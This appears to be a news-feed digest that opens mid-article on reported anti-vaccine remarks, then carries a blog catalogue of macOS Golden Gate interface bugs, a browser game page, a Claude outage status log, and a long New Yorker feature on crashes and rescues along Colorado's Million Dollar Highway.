“The time has come to stop caveating every introduction with ‘I’m not an anti-vaxxer, but …’ Vaccines are a nightmare, and only anti-vaxxers can speak clearly enough,” Gorton said at that conference, adding: “More vaccines, more autism. It’s that simple.”

Focusing on opening up health data is new for the Maha Institute. But having greater access to US health information would help advocates make new links to the issues they have long focused on, Gorton said on Monday. Organizations including the Maha Institute, which exists outside the government but enjoys close ties to top leaders such as Kennedy, can “fill the gaps” and “bring political pressure”, he said.

Kennedy thanked Gorton, his longtime friend, for his “incredible support”.

macOS Golden Gate Is a Buggy Mess

Hacker News
www.squareorbits.com
2026-09-29 10:32:33
Comments...
Original Article

In June 2008 Apple announced Mac OS X Snow Leopard, proudly boasting that it would have "no new features" . Instead of piling on new things, Snow Leopard aimed to build on the success of its predecessor, Leopard, opting to focus on under-the-hood performance and stability improvements throughout the system.

18 years later, Apple is taking a similar approach with macOS 27. Golden Gate aims to fix the missteps of last year's Tahoe, promising an expansive set of improvements and "a more responsive and delightful experience" .

Does it hold up? Here are just some of the bugs I’ve encountered in my daily use over the past couple of weeks.

Finder icon upside down on Golden Gate's default wallpaper.

Alignment is hard

Let's start with some good old alignment bugs. Centring things is the hardest problem in computer science , after all.

Take the QuickTime record button. Hey, at least it's vertically centred.

QuickTime window with recording icon misaligned.

And here are the window tiling icons. These were centred at some point, I'm sure.

Window tiling icons misaligned.

Text is affected, too, but I'm not sure this is even attempting to look centred.

A password field with the placeholder text misaligned.

And this is the first thing you see when you open System Settings. A little bit more padding under the heading wouldn't hurt, no?

The heading for "General" in System Settings with strange line height.

Things they forgot

Opening the Mac User Guide, I was quite surprised to find that it was for last year's OS. This made me wonder: what else did they forget?

The Mac User Guide for macOS Tahoe.

We're bound to find things Apple overlooked poking around the Touch Bar settings. Sure enough, here's Siri's old logo.

The old Siri logo in the Touch Bar settings.

The Network app, too, can’t make up its mind whether to use its new icon or not.

Old and new Network app icon, both visible in different places.

And I know I'm nitpicking (I'll indulge myself some more later), but the window controls now have a glossy sheen. Nobody seems to have told the Mission Control app.

Old window controls in the Mission Control app icon.

Bugs

In this release, Apple changed the architecture of the menu bar, breaking a number of third-party menu bar management apps.

It also introduced several bugs, and even the occasional crash. Let's have a look!

Running the cursor along the top of the screen in Mission Control causing a strange visual glitch with the menu bar.

I know my machine's getting old, but does it really need a second to load in the Profiles menu when I open a new Firefox window?

Profiles menu appearing after a momentary delay.

And why does it keep highlighting the File menu for me?

The File menu mysteriously highlighted.

This is a fun one. Try moving the green camera icon. Oops! You've crashed the menu bar.

The menu bar restarting after crashing.

Bugs are elsewhere in the system, too. Sometimes the search bar in System Settings simply refuses to work.

A search for "battery" and "security" not bringing anything up.

Not that it's much use when it does function. Here's me trying to move down the search results with the arrow keys.

Moving down the search results in an incoherent way.

Also new in this release: links are only clickable for a split second. Miss it and it's gone!

Hovering over a link with the hand cursor only visible for a split second.

I'm still not sure what this button is actually meant to do. I've been pressing it for over an hour now.

Clicking a button in Quick Look that does nothing.

About as much time as I've been waiting for this volume slider to auto-hide itself. It never took this long in the past.

The Touch Bar volume slider in its expanded state.

Now onto Mission Control. Here's a fun fact: You can find references to NeXTSTEP , the ancestor of macOS, in its UI! You're not supposed to, mind.

The text "__NSTextViewCompletionWindow", an obvious holdover from NeXTSTEP.

I'm not sure this is supposed to happen, either. Capturing these bugs is hard work when you can’t even trust the tool you’re using to behave properly.

The Screenshot app visible twice, with a spurious app icon.

Window sizes can also be miscalculated.

A highlight around a TextEdit window, much too big.

And window controls can disappear altogether.

A full screen Finder window with no window controls.

Tiling has always been a struggle in macOS.

The window divider in split view appearing in the wrong place.

If you want a challenge, try to recreate whatever's going on here. Go on, give it a go.

The top bar in Mission Control visible over an application, with the Apps search bar open too.

Nitpicking

I can't in good faith include these as regular bugs. I'd like to think there was a time when you could expect macOS to be obsessively polished, but I recognise no software is perfect, and you have to draw a line somewhere. But if I was promised refinements...

Returning to the Touch Bar, why does this one icon not match the UI on screen?

Discrepancy between the screenshot icon in the Touch Bar and the one on screen.

Another one for you fact fans: try using the screenshot app to capture an app window and you'll discover the only straight corner in the entire OS. Don't tell the Apple design team.

A window highlighted by the screenshot tool with a straight corner.

This one just irks me. Show me one oval camera lens anywhere in the world. I'm waiting.

The Screenshot app icon with a camera that has an oval lens.

And here, shouldn't there be some sort of visual feedback when I click on this menu item? A hover effect? Anything?

Clicking on a menu item in System Settings with no visual feedback.

And lastly, something I find unintuitive. I have a folder open in the Dock. If I click on another folder, shouldn't that then open?

Clicking on another folder in the Dock, only for it to close the current folder.

Conclusion

Okay, I admit it. Once I started to notice a few, I did purposely go looking for bugs. But not very hard, promise.

And that's the point. In a release where "nothing was off limits, no enhancement too small" , it shouldn't be this easy to find bugs in daily use.

Perhaps there's hope yet. Snow Leopard had nearly two years of refinements to achieve the level of polish and stability its name has become synonymous with today. Maybe the annual release cycle has become a burden, and Golden Gate just needs more time.

If AI has really sped up software development as much as we're told, this shouldn't be a problem.

One final bug

To finish, here's my favourite bug. When using the Colours window, if you're the sort of person who uses its built-in eyedropper tool to choose a colour from the wheel (rather than simply clicking on it directly), then congratulations: doing that hangs the entire system, and you've got no choice but to force a restart.

The Colours window open with the eyedropper tool being used on its own window.

And rightly so, you freak.

Destroy Any Website

Daring Fireball
destroy.spritefusion.com
2026-09-29 10:29:28
Desktop only, and you definitely want sound on. With things like this I always start with Kottke.org. No idea why, because it’s quite possibly the last site on the entire web I’d want to see actually destroyed. (Well, second-to-last.)  ★  ...
Original Article

Sprite Fusion Presents

Type an address, break everything.

Sprite Fusion Presents

Destroy Any Website

The game is not available on mobile, try it on a laptop!

The stickman shooting the title of Wikipedia's Stick figure article to pieces

Put it on your website to let your users smash your website.

Destroy this website Destroy this website


   

Waiting for the host to pick a website.

The match goes on while this menu is open.

A D / arrows

run

Space / W

jump - tap again to flip - hold to fly

S

drop through - hold to fall through

Mouse

aim, click to shoot

Right click

throw a grenade

1-7 / wheel

switch weapon

Match over -

Waiting for the host to start the next match.

Claude partial outage

Hacker News
status.claude.com
2026-09-29 10:25:41
Comments...
Original Article

Update

The errors that began at 14:00 UTC were mitigated at 14:36 UTC, and existing conversations are mostly working again. A second issue is preventing many users from signing in (single sign-on and Sign in with Apple are unavailable), starting new chats, voice conversations and Claude Code or Cowork sessions, making purchases, and uploading files. If you're signed in, please don't sign out. We're working on a fix and will post another update within 30 minutes.

Posted Sep 29 , 2026 - 15:00 UTC

Update

We have applied a mitigation and error rates have dropped substantially. Some sign-in attempts, account actions and Claude Code and Cowork sessions are still failing. We are continuing to work on a full fix.

Posted Sep 29 , 2026 - 14:41 UTC

Update

We are investigating reports of degraded performance affecting claude.ai, platform.claude.com, the Claude API, Claude Code, and Claude Cowork. We will provide an update as soon as possible.

Posted Sep 29 , 2026 - 14:30 UTC

Update

We are investigating elevated error rates affecting Claude.ai (including the desktop and mobile apps), Claude Code and Claude Cowork. Some requests to the Claude API are also returning errors. We will provide an update as soon as possible.

Posted Sep 29 , 2026 - 14:28 UTC

Investigating

We are investigating elevated error rates affecting Claude.ai (including the desktop and mobile apps), Claude Code and Claude Cowork. Users may see failed requests, errors loading or sending conversations, or be asked to sign in again; retrying may succeed. We will provide an update as soon as possible.

Posted Sep 29 , 2026 - 14:21 UTC

This incident affects: claude.ai, Claude Console (platform.claude.com), Claude API (api.anthropic.com), Claude Code, and Claude Cowork.

Why Doesn't Anyone Want to Fix One of America's Scariest Roads?

Hacker News
www.newyorker.com
2026-09-29 10:23:35
Comments...
Original Article

The Million Dollar Highway, prone to rockfall and avalanches, is the site of horrific crashes and courageous rescues.

The highway, in the southwestern part of the state, has made lists of both the most dangerous and the most appealing roads in the country. Video by Jamey Stillings for The New Yorker

In the valley where I live, along a quiet stretch of the Uncompahgre River, in southwestern Colorado, there is only one paved road, and, like most people around here, I don’t drive it south without a good reason. In that direction, the road—U.S. Highway 550—passes through the small mountain town of Ouray, and then it climbs more than two thousand feet in the span of six miles. This section of the two-lane road has been carved directly into the red-quartzite cliffs of the Uncompahgre Gorge, and almost none of it has a shoulder; in some places, the highway is only twenty-three feet wide. The speed limit is twenty-five miles an hour, and one way to identify locals is that they often drive faster than that. This is because they worry about what can happen above the road. Rockfalls are common, and so are avalanches. There are more than sixty named slide routes along this part of the highway, and residents refer to them in personal terms, like bad neighbors who are always home: Riley Boy, Mother Cline, Slippery Jim. Highway 550 is the most avalanche-prone road that’s open year-round in the United States.

Visitors are more likely to be concerned with what lies below. Many sections of the road have a sheer drop of more than four hundred feet, and there are no guardrails, because of the need to push snow off after avalanches. When the route was constructed, in the eighteen-eighties, it was considered one of the greatest achievements in road engineering in the American West. Its purpose was to serve the silver and gold mines of the San Juan Mountains, but almost immediately the road also began to attract tourists. At some point in the early twentieth century, for reasons that are now obscure, the section above Ouray became known as the Million Dollar Highway.

In 2013, USA Today featured the Million Dollar Highway; the Death Road, in Bolivia; the Highway of Death, in Iraq; and nine other infamous routes in an article titled “World’s Most Dangerous Roads.” Less than a year later, the paper’s “10 Best Bucket-List Road Trips” also included the Million Dollar Highway. Strictly speaking, there’s nothing contradictory about the same road appearing on both lists, although it helps explain why the Ouray County coroner used the phrase “attractive nuisance” when we talked about the road recently. People can behave erratically on the Million Dollar Highway. There has been at least one instance in which a driver got into a heated argument with her passengers, pulled over, kicked them out, and then, in full view of everybody, accelerated straight off the edge, to her death. One man travelled all the way from the Netherlands just to propel himself off the road. The G.P.S. data on the Dutchman’s phone showed that he had driven repeatedly up and down the highway before choosing one of the most dramatic drop-offs.

Occasionally, a vehicle seems to vanish. Last year, early on the morning of August 5th, a tourist from Oregon named Adam Hynes was approaching one of the most treacherous sections of the gorge when he looked ahead and saw a silver Honda Civic moving in reverse. Hynes found it strange that somebody would be driving backward in such a spot, but then his view was obscured as he went around a sharp bend. By the time Hynes came out of the turn, the Honda was gone.

Hynes dropped a pin on his phone. There was no signal, so he continued down the highway until he was able to call 911. Then he circled back and parked at a pullout not far from the pin. The gorge was so precipitous that Hynes couldn’t see the bottom, but he had a DJI Mavic 3 drone. He set the machine aloft, and its camera captured the Honda, which had fallen three hundred and twenty feet—about the height of a thirty-story building. The silver vehicle lay upside down in the Uncompahgre River, crumpled like an aluminum can.

When an accident occurs on a steep part of the road, police and emergency services wait until skilled climbers arrive. On that morning, a call went out to the Ouray Mountain Rescue Team, a local volunteer organization that is staffed with many expert climbers. Two members, Jeff Skoloda and Tim Pasek, arrived and strapped into harnesses and helmets. They climbed down a rope that led to a Tyrolean traverse, a fixed cable that runs over the river to the other side of the gorge. After that, they installed a rope on the far cliff wall and rappelled down to the Honda. It took them about twenty minutes to reach the wreckage.

As Skoloda approached, he couldn’t tell how many people were inside. He is in his fifties, a successful sculptor and metalworker who owns a large workshop in Ouray. Since joining Ouray Mountain Rescue, in 2000, he has helped recover more than a hundred bodies, often in treacherous terrain. Many have been climbers, skiers, or other recreationalists, but some were found in vehicles that tumbled off the Million Dollar Highway. When Skoloda kneeled beside the Honda, he heard a scream.

Three angels giving God notes on the Bible.

“My only note is maybe you don’t need to start every sentence with ‘and.’ ”

Cartoon by David Ostow

Until then, the men had assumed that they were involved in a recovery operation. Now they tried to open the doors, but the Honda was too damaged; a handle broke off in Skoloda’s hand. The screaming sounded like a young girl, but the voice was muffled and hard to hear above the rushing river. They couldn’t see her face, because that side of the car had landed against a large boulder. But there was a small gap in the broken window on the other side, and Pasek reached in and touched a bare foot.

“Can you feel that?” he asked.

“Yes.”

“Are you hurt?”

“Yes!”

Pasek used his emergency radio to tell rescue services on the road above that there was a survivor. They asked him to estimate how old she was, in order to figure out what size equipment might be necessary. The tumbling vehicle had left a long trail of debris across the sheer cliff—shoes, clothes, books, papers, luggage. Near the end of the trail, a children’s book was lying in the dirt. Pasek picked it up: “A to Z Mysteries: The Zombie Zone.” He has two children of his own. He looked at a page and made a guess—“I think she’s probably about ten.”

In 2008, the public-school district of Ridgway, a town north of Ouray, donated a decommissioned school bus to Ouray Mountain Rescue. The team transported the bus to the Million Dollar Highway, where they shifted it into neutral and tied the steering wheel so that it wouldn’t turn. Then they positioned a loader behind the bus and pushed it off a curve in the road.

Skoloda attended that training exercise, and he still has vivid memories of the school bus flying through the void and then sticking into the side of the mountain. “It kind of lawn-darted into place,” he told me recently. After the vehicle came to rest, the rescue team helped twenty volunteers climb down and position themselves inside the bus. The volunteers wore moulage makeup that resembled blunt-force injuries, and each of them had a script to follow. Two mannequins were also placed inside—fatalities. For the next two hours, the rescue team practiced cutting into the bus with extrication tools, and they made triage and evacuation decisions based on the role-played injuries of the volunteers. A temporary morgue was set up on the Million Dollar Highway.

That particular training has not been repeated, but people still think a lot about school buses and children on the highway. A mass-casualty event would overwhelm the resources of a rural community. I coach the high-school track team in Ridgway, and on two occasions I’ve driven a busful of teen-agers to a meet via the Million Dollar Highway. The school has strict rules: If I’m driving a fourteen-passenger bus and the weather is good, I can take the highway. But, if we’re in a larger bus or the forecast is bad, we’re required to follow a longer route, to the west, that avoids steep drop-offs. The middle school used to take field trips south, in order to visit historical sites, but that stopped a few years ago, after bus drivers expressed concern. Nowadays, all field trips head in other directions. In essence, many residents live with their backs to the steepest sections of the highway.

The orientation was the opposite in the old days, when all attention was directed to the highlands. In 1882, major silver deposits were discovered in the Red Mountain Mining District, south of Ouray. Government surveyors had declared that it was impossible to build a road through the gorge, and Ouray had tried twice without success. Another settlement, Silverton, lay on the far side of Red Mountain, and the communities vied to see which could become the main transport hub. In 1883, La Plata Miner , a Silverton newspaper, mocked the competitor’s ambitions: “The people of Ouray say they will build a road to Red Mountain. How absurd and ridiculous.”

That summer, Ouray contracted with a man whose nicknames included “Hebrew Pathfinder of the New West” and “Moses Who Piloted San Juan out of the Wilderness.” Otto Mears was born in Russia, to Jewish parents, in 1840; his mother came from what is now Latvia, and his father was English. Both parents died before Mears was three, and he was passed off among relatives who didn’t want to care for him. At the age of nine, he was shipped on a lumber freighter from Russia to England; a year later, he was sent to the United States. He received almost no formal education, and he worked full time from age eleven, eventually finding odd jobs in California mining towns. He observed that miners and prospectors were usually poor, whereas people involved in transport and merchandise thrived.

During the Civil War, Mears enlisted with the Union Army, which sent him to the Southwest. At the end of his service, he received an assignment to bake bread for soldiers, which allowed him to profit from the leftover flour. After saving some money, Mears opened the first sawmill in southwestern Colorado, along with a flour mill, both of which supplied the military. He was a genius at figuring out frontier businesses that complemented one another. He helped found towns in southern Colorado, and he started newspapers that promoted those towns; sometimes he also acquired government contracts to build their roads and deliver their mail. The Ute Indians were the dominant tribe in the region, and Mears was one of the few whites who learned to speak their language fluently. He served as the federal government’s translator in treaty negotiations, and he became a close friend of Chief Ouray, the tribe’s most important leader.

A black and white photo of two people.

Chief Ouray with Otto Mears, who developed the original highway. Photograph by William Henry Jackson / Courtesy Archives of American Art, Smithsonian

Mears’s greatest talent was for road-building. In Colorado, which didn’t become a state until 1876, there was little public money for infrastructure, and entrepreneurs could pay a few dollars to the local government for the right to build a toll road. In the course of two decades, Mears created a network of almost four hundred and fifty miles of roads. He had no engineering background, but he often laid out routes himself. South of Ouray, many sections had to be blasted out of eight-hundred-foot cliffs. Workers were suspended by ropes: they drilled holes in the quartzite, packed the holes with dynamite, lit long fuses, and gave a signal to be yanked up to safety as quickly as possible. According to “The Road That Silver Built,” a history of the highway’s early years, there were reports that five of Mears’s workers died.

The road was open for traffic in less than six months. Mears set up a tollgate, charging a dollar for a horse and rider and five dollars for a team and wagon. He reportedly collected more than a hundred thousand dollars from his roads in a single year, and Ouray boomed. After Silverton lost the race to Red Mountain, local officials contracted with Mears, who then built their road, too. For good measure, he purchased stock in a silver mine near the pass where the two routes came together; for a spell, the mine paid an annual dividend of forty-five per cent. After four years of operating the Ouray road, he sold it to the town.

Mears was, by all accounts, unsentimental about his origins. When dictating his autobiography, he covered his childhood—the dying parents in Russia, the orphan shipped off to England and America—in fifteen sentences. He became heavily involved in Colorado politics but usually behind the scenes, and he seemed to hold no high ideals or scruples. He often paid bribes, and he did everything possible to resist organized labor. When most of the Utes were inevitably driven out of Colorado—after every treaty had been broken by the Americans and violence had ensued—Mears helped negotiate the terms of their departure. As the Army escorted the Utes out, Mears charged them tolls for using his roads. He also acquired contracts that allowed him to profit from developing a supply chain that served the Utes’ new home, in a part of Utah so desolate that even the Mormons didn’t want to live there.

In 1911, a motorcar drove up to Red Mountain Pass. The dealership that sponsored the journey described it as “one of the most remarkable, perilous, and daring trips ever undertaken by an automobile on the American continent.” By the following decade, people had started using the phrase “Million Dollar Highway.” This didn’t refer to the cost of Mears’s original project, which had been about a hundred and forty thousand dollars. In the nineteen-twenties, a series of road improvements were made for a total of about a million dollars, which may have been the source of the name, although some maintain that it came from the spectacular views. Mears died at the age of ninety-one, and the end of his life seems to have been as unsentimental as its beginning. According to the biography “Otto Mears and the San Juans,” there were conflicting stories about where his ashes were scattered. Some reports claimed that they were tossed onto the road near the site of his former toll booth.

From the moment that emergency services arrived in response to the wrecked Honda, it was nearly two hours until rescuers saw the girl’s face. Climbers had to assist two firefighters carrying extrication equipment into the gorge, and then Pasek, who is also a member of the Ouray volunteer fire department, used the tools to tear off the driver’s door. He and Skoloda removed the body of a middle-aged man, who had been driving. Then Pasek took off a back door. “As I pried it open, we could see the girl,” he recalled. “Her skin looked good. She wasn’t pale. She was just looking at us.”

A photograph of a buggy on a road.

A buggy on the road, around 1909. Photograph courtesy Denver Public Library Special Collections

She said her name was Rachelle, and she was eleven. She complained of being cold; the river had soaked her legs and jacket. She had found herself upside down, suspended by her seat belt. Even after unclipping the belt, she could hardly move, because she was crammed atop the body of her great-grandmother. As Pasek and Skoloda carefully extricated the girl, they could tell that she had sustained serious injuries to her pelvis and to one arm. They placed her on a vacuum mattress beside the river and covered her with blankets and the firefighters’ jackets.

They weren’t equipped to check for internal bleeding and other major injuries, but Rachelle’s vital signs seemed good. She told Skoloda that she had never lost consciousness. “It was shocking how clear she seemed,” he said later. Rachelle explained that she had been on vacation with her father and her great-grandmother, and they had been returning to their home in New Mexico when her father had suddenly decided to stop and drive in reverse. Rachelle described in detail the way that the Honda had backed off the cliff, flipping multiple times.

On the highway, Mike Gibbs, a Ouray Mountain Rescue member, was figuring out how to get the girl out of the gorge. The hillside was too treacherous for anybody to carry a litter up it, and a helicopter couldn’t descend in such a narrow airspace. Rachelle needed to be transported along two axes: first, straight up, to a height that would clear the entire cliff. Then she would have to be moved horizontally to the roadway. The rescuers needed to construct something that functioned like a four-hundred-foot crane.

Gibbs runs a company called Rigging for Rescue. He has a large climbing wall and warehouse in Ouray, where he often hosts trainings. He also travels around the world to work with mountain-rescue teams, specialized military units, and others who need technical rope skills, including windmill installers, and bridge and skyscraper builders.

On the cliff, Gibbs decided that the best solution was to construct a complicated series of tensioned ropes known as a Kootenay Highline System with a Norwegian reeve. This consists of horizontal tag lines that transport a series of pulleys, which, after moving into the proper position, can descend straight down to receive a load. For more than twenty years, Gibbs had been teaching people how to build a Norwegian reeve, but he had never before used one for an actual rescue.

The first step was to find a large tree next to the highway that could serve as an anchor. Then, with a pair of binoculars, Gibbs spotted a similar tree on the opposite side of the gorge, four hundred feet away. One team member was a sharpshooter, and he aimed a line-throwing device that was shaped like a rifle. It used a .308 cartridge to fire a projectile connected to a monofilament line. Other climbers scrambled up the far side of the gorge and secured the line. The monofilament was slightly heavier than a fishing line, and it was strong enough to pull a light cord across the gorge. Then the cord dragged heavier lines that were capable of supporting large loads. The ropes moved across one by one, and every time somebody tied a knot, it had to be double-checked by another person, according to team protocol. It took about three hours to build the network of tensioned ropes.

Far below, Skoloda, Pasek, and another team member tried to keep Rachelle comfortable. Skoloda talked with her about family and school; she said that she liked reading and that the book on the cliffside had been a new one. She referred to the driver of the Honda as Dad, although later the rescuers learned that he was an uncle who had become the girl’s legal guardian. Periodically, Rachelle asked whether her dad was alive. Skoloda and Pasek had been careful to cover the bodies and keep them out of sight. Each time Rachelle inquired, Skoloda gently evaded the question. “You know, we’re just going to worry about you right now,” he said, and changed the subject. Finally, Rachelle stopped asking.

The month after the accident, Skoloda drove me to the site in his Dodge pickup, pointing out locations along the Million Dollar Highway. “This right here is where people will do it intentionally,” he said, passing the Ruby Walls, a section of cliffs that were purple-red in the afternoon light. “A few years ago, a woman committed suicide right here. She had a seat belt on. But she had a suicide note in her pocket. Her husband had shot and killed a police officer in Montrose. I think she was in a pretty hard spiral.”

People who die by suicide on the Million Dollar Highway often wear seat belts. Glenn Boyd, the county coroner, told me his theory is that they don’t want to be annoyed by a dinging sound in their final moments. Occasionally, the suicide seems to be spur of the moment; a depressed person sees a high section without a guardrail and goes over. Skoloda drove higher into the gorge, where every bend seemed to trigger a memory. “Just around this corner, we had a young man who was racing his vehicle and just totally misjudged a corner,” he said. “He survived the crash. He went a long, long ways down. I don’t know what happened to him after. Severe head trauma. Multiple-system trauma. Wasn’t much left of his vehicle. We do spend a lot of time up here.”

Skoloda parked at one of the few pullouts. Traffic was light, and we walked onto the road. Originally from Wisconsin, he is a tall man whose build has been shaped by decades of grabbing metal and rock: big hands, Popeye forearms. His wife, Nicole, has also volunteered with the rescue team, and they have two teen-age daughters. Other team members told me that they like having Skoloda interact with victims, because his calm air puts people at ease. Now he stopped at a series of white scrapes on the edge of the pavement. “This is the undercarriage marks from where they left the road,” he said. Just beyond the marks, the abyss fell away for hundreds of feet. We didn’t stand there long.

Skoloda loaned me a helmet and a harness, and we scrambled down a fixed rope to the Tyrolean traverse. We clipped in and swung across the river. The water was mineral orange and flowing fast. “It feels wild in here,” Skoloda said, after we reached the other side. We clambered over some boulders; above us were a couple of gnarled limber pines, which are famously long-lived. Skoloda noted that they could be more than a thousand years old. He pointed at a dark tangle of trees across the gorge. “Right in there is a nineteen-eighties-era Subaru,” he said. “It’s got snow tires on it. It’s wrapped around a tree.”

Nowadays, crashed vehicles are removed promptly, in accordance with the law, but there are still some leftovers from when this wasn’t always the practice. Travellers sometimes spot them and call 911. One year, two rescue-team members hiked through the gorge with cans of orange spray paint, drawing a large “X” on every vehicle they found.

Skoloda climbed to a ledge directly above where the Honda had come to rest. “Here is a real good place to envision which way it fell,” he said.

He pointed across to the debris field, which was still scattered across the steep slope. Pieces of metal and plastic glistened in the sunlight; otherwise, there were no signs of civilization. The road wasn’t visible, and if any cars were passing by I couldn’t hear them over the river.

The San Juans are among the most impenetrable mountains in the West. Spanish explorers likely named the region after John the Baptist, because he wandered in the wilderness. Even in modern times, this quality has captured the imagination of outsiders. In the nineteen-fifties, the author Ayn Rand spent time in Ouray, during a move from Hollywood to New York City. Like Otto Mears, Rand was a Jewish Russian émigré with a distaste for organized labor, and she turned Ouray into a fictional location called Galt’s Gulch in her polemical 1957 novel, “Atlas Shrugged.” In the novel, the industrialist John Galt and other magnates have retreated to the hidden mountain town out of disgust with labor strikes and overregulation in a dystopian America. “We have no laws in this valley, no rules, no formal organization of any kind,” Galt proudly tells the novel’s heroine when she visits the alt-Ouray. “So I’ll warn you now that there is one word which is forbidden in this valley: the word ‘ give. ’ ”Above town, on a granite pillar, citizens have erected a three-foot-tall dollar sign of solid gold. The Million Dollar Highway, however, was written out of Rand’s fictional landscape, probably because she wanted Galt’s Gulch to be as inaccessible as possible.

Self-reliance and personal responsibility have always been prominent local values. It’s rare for residents to complain about the highway’s lack of guardrails or other safety measures; the general idea is that you need to adjust your behavior according to the risks of weather and geography. Dack Klein, a lead worker for the Colorado Department of Transportation who lives in Ouray, pointed out that the vast majority of incidents on the road involve only one vehicle. “Most accidents are because the driver wasn’t paying attention or did something wrong,” he told me. Klein, who has a large tattoo of the words “We the People” on his arm, dismissed the idea of building guardrails. “A guardrail makes you feel warm and fuzzy, but there’s not a lot of room up there for it,” he said.

On the day the Honda went over, Klein was one of more than thirty people from various government agencies who worked on the scene. He was there from 8 A . M . until after midnight, and, like Skoloda and others, he had many stories connected to specific parts of the road. Matt Hepp, an engineer and a climber who volunteers with Ouray Mountain Rescue, created a reference map that notes mile markers and some of the most notorious sections. Tuffy’s Corner, named for a local undertaker, is a frequent accident site, and Harley Corner is a reducing-radius turn that sometimes catches motorcyclists off guard. Part of the problem with Harley Corner is that bikers start the curve in front of a spectacular mountain backdrop. “They come around the turn, they look at the view, and then the radius hits them,” Hepp told me. “And the pegs catch and they go right over.” The drop-off there is only about forty feet, and bikers usually survive with non-catastrophic injuries. They tend to land in the same spot, as if the road were engineered to deposit them there. “We had a joke that we should drag a queen-size mattress over there,” Hepp said. Despite the repeated accidents, nobody has erected a motorcycle-specific warning sign on the road.

On one part of the road, there are more than sixty named avalanche slide routes. Video by Jamey Stillings for The New Yorker

Another section is known as Miracle Gully. In February, 2005, a man named Joe Sullivan was returning home to Montrose, a town north of Ridgway, after watching his daughter play in a high-school basketball game on the other side of the San Juans. Sullivan was driving a Pontiac Montana minivan carrying his wife, son, and daughter, along with one of his daughter’s teammates and her father. By the time they crossed the eleven-thousand-foot pass on Red Mountain, it was snowing. On the steep descent, Sullivan slowed to ten miles per hour. As he approached a sharp curve on one of the high cliffs, the vehicle lost all traction. A high-school wrestling match was playing on the radio. The car was moving so slowly that everybody had plenty of time to see what was happening. The last thing that Sullivan said, in a voice that was surprisingly calm, was “I’m sorry, we’re going off.”

The minivan tumbled off the cliff and rolled multiple times, falling more than four hundred feet. When it came to a halt, Sullivan found himself alive, with snow inside the car up to his chest. The only person who needed medical attention was his wife, who later received a few staples on the back of her head. Everybody else walked out of the gorge under their own power, following a rope line that had been set up by Ouray Mountain Rescue. Initially, when the rescue team fielded the call, they worried that they didn’t have enough body bags in stock.

The following week, Katie Couric interviewed the Sullivans for the “Today” show. In the years since, two other vehicles have gone off at the same spot, and, each time, everybody has survived with minor injuries. Once, a driver went over in a box truck loaded with Toyota parts, flipped multiple times, fell a total of four hundred feet, and walked away with a broken pinkie. These accidents have always occurred in winter, and Skoloda told me that Miracle Gully is shaped in such a way that it cushions the descent in heavy snow. When the Sullivans crashed, their Pontiac’s airbags never even deployed.

Sullivan was cited for unsafe mountain driving, and he travelled twice to the Ouray courthouse in order to fight the charge. The second time, he was joined by the state highway patrolman who had issued the ticket and by a Catholic priest who had been on the road that night and testified that conditions had been treacherous. The judge retreated to his chambers after telling the three of them to work it out. With the priest officiating, the patrolman offered a reduced charge of unsafe tires, which Sullivan accepted. He paid a fifteen-dollar fine, but no points were added to his license. When we met recently, at his home in Montrose, he said that fighting the ticket had been important to him back then because he’d come so close to having his family destroyed. “You have an accident like that, you don’t want to be guilty,” he told me.

His son, Tyrel, who was seventeen at the time, had been sitting directly behind his father in the Pontiac. Today, Tyrel is a thirty-eight-year-old architect in Montrose, with a young family of his own. He told me that he couldn’t remember the last time he had driven the Million Dollar Highway, and his wife refused to travel on it. For many years after the accident, Tyrel had nightmares. But these dreams never involved falling or crashing. Instead, it was always the same scenario: something unexpected had come up, and now Tyrel had no choice but to drive past Ouray. It was a San Juan version of the exam-anxiety dream, with the Million Dollar Highway representing a test that he wasn’t prepared to take.

After the rescue team had constructed the highline ropes with the Norwegian reeve, Pasek ascended it with Rachelle. The girl was strapped into a litter, which was roped into the reeve’s pulleys. The pulleys allowed for a load to be lifted with less force, and the pace of ascent was controlled by a capstan, a motorized drum that pulled in rope from the road. It took about ten minutes to raise Pasek and Rachelle more than three hundred vertical feet. To keep her calm, Pasek described what they were doing, step by step. It had been five and a half hours since the Honda went off the road, but the child remained lucid. Partway through the ascent, she asked, “Is there a chance we could fall?”

“No,” Pasek said.

At the top, he clipped into a carriage that connected to the horizontal track rope, and they traversed the hundred and fifty feet to the road. Everything worked flawlessly; the carriage deposited them onto the highway. An ambulance rushed Rachelle to a helicopter that was waiting to transport her to Children’s Hospital Colorado, in Colorado Springs. While strapping Rachelle into the litter, Pasek had tucked in the children’s book that he had found in the dirt.

For the next hour and a half, the system transported the five rescue workers and the two bodies that were still at the bottom of the gorge. When I talked with the rescuers, they all described a similar experience. Initially, there was a thrill at being lifted by the ropes, but then, as they floated above the site, they felt a wave of sadness. “The way my mind works, the rigging was so cool,” a fireman named Tom Fedel told me. “To see how it was put together, and to see what they had accomplished.” But then he looked down at the debris field. “Her little sweatshirts, you could tell it was kid’s clothes,” he said. “A suitcase split open. A lot of papers. Just people’s things—they’re nothing now. They’re just stuff on the side of the mountain.”

Later that month, the coroner released details from the Honda driver’s autopsy report. His blood had contained a hundred and ninety-five nanograms of THC per millilitre, which is thirty-nine times the legal threshold for a driver in Colorado.

Skoloda had ridden the ropes out of the gorge with a Ouray Mountain Rescue volunteer named Annie Quathamer. As they approached the top, he told her, “I’m getting a little sick of this.” Jenny Hart, who had volunteered since the late nineteen-nineties, told me that the Honda wreck made her think about retiring. “I’m carrying twenty-eight years of scars,” she said. “That rescue put an exclamation point on it for me. Because I’m a teacher, and kids are different for me.”

The group, which has an annual budget of about fifty thousand dollars, is funded primarily by donations. Local support is impressive, as described in “No Individual Heroes,” a history of the rescue team. After somebody works on a traumatic incident, that member is contacted by a mental-health professional at intervals: three days later, then three weeks, then three months. Retired volunteers told me that you never know what might push you past the limit. Glenn Boyd, the coroner, grew up in Ouray. His stepfather was an E.M.T., whose moment came when he worked an accident and found two empty baby seats. The driver was unconscious; Boyd’s stepfather and his crew scoured the site desperately. It turned out that the man had been transporting the seats without any children, but the experience pushed Boyd’s stepfather to retire. “Just the trauma of searching and searching for kids was the final straw,” Boyd told me.

Two weeks after the Honda accident, a sixty-five-year-old woman intentionally drove her motorcycle off the Million Dollar Highway. This seemed to have been a decision she made on the road: there was no suicide note, and the coroner told me he believed that the woman had not intended to kill herself when she left home that day. Another motorist saw her speed off a cliff without trying to turn or stop, and she wasn’t wearing a helmet. She was still alive when Skoloda and others arrived at the scene. She died while they were transporting her in a litter.

